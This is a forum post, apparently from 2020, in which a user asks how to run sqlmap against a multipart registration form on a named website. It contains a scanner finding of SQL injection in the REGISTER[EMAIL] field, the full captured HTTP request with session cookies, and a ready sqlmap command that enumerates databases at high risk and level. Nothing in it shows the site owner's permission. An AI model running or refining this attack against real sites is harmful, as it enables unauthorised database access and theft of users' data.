
03.06.2020, 18:49
Message from Axiles
Good afternoon, could you please tell me how to put a POST request like this into sqlmap. As I understand it, I also need to specify --data. Thanks
http://prntscr.com/st216j
Code:
The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL]
Discovered by SQL injection
Attack Details
POST (multipart) input REGISTER[EMAIL] was set to 1'"
Error message found:
You have an error in your SQL syntax
Code:
POST /cabinet/registration/?backurl=/cabinet/&register=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b
Referer: https://aachibilyaev.com/
Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUEST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITRIX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPIRE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversion_visit_day%22%5D%7D;catalogViewMode=list;_ym_debug=null;last_visit=1591170065298::1591180865298;top100_id=t1.6912325.390564327.1591180865288
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1021
Host: aachibilyaev.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]"
g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[EMAIL]"
1'"
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[LOGIN]"
1
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[NAME]"
TWSfSopc
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PASSWORD]"
g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]"
555-666-0606
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="backurl"
/cabinet/
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="licenses_popup"
Y
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button"
reg
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button1"
register_submit_button1=Регистрация
------------Q9OXvYdJGy9b--
sqlmap.py --url "https://aachibilyaev.com/cabinet/reg.../?register=yes" --data="backurl=/cabinet/login/&register_submit_button=reg&REGISTER[NAME]=asdasd&REGISTER=1*&REGISTER[PERSONAL_PHONE]=+7 (123) 123-12-31&REGISTER[PASSWORD]=1234567&REGISTER[CONFIRM_PASSWORD]=1234567&REGISTER[LOGIN]=1&licenses_popup=Y&register_submit_button1=Регистрация" --dbs --risk=3 --level=3 --dbms=mysql
P.S. There is filtering there.